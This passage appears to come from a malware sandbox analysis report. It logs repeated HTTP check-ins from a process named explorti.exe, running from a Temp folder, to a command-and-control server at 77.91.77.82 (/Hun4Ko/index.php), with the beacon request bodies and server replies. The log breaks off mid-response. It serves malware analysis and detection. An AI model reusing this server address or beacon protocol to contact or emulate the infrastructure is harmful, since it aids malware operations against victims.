                                                                Jul 3, 2024 08:39:05.063467979 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.64975677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:05.179975033 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:05.876794100 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:05.877751112 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:06.095201969 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.64975777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:06.210151911 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:06.887546062 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:06.888955116 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:07.102644920 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.64975877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:07.224395037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:07.928508997 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:07.929563999 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:08.149596930 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.64975977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:08.271183014 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:08.985286951 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:08.988435984 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:09.214785099 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.64976077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:09.333419085 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:10.010462046 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:10.011279106 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:10.224499941 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.64976177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:10.334022999 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:11.029293060 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:11.033631086 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:11.251535892 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.64976277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:11.364980936 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:12.041493893 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:12.042407036 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:12.259670973 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.64976377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:12.382735968 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:13.074999094 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:13.079147100 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:13.300297022 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.64976477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:13.413486004 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:14.106231928 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:14.107431889 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:14.329005957 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.64976577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:14.443593979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:15.121663094 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:15.122597933 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:15.334474087 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.64976677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:15.443147898 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:16.129196882 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:16.132478952 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:16.350755930 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.64976777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:16.463082075 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:17.186646938 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:17 GMT
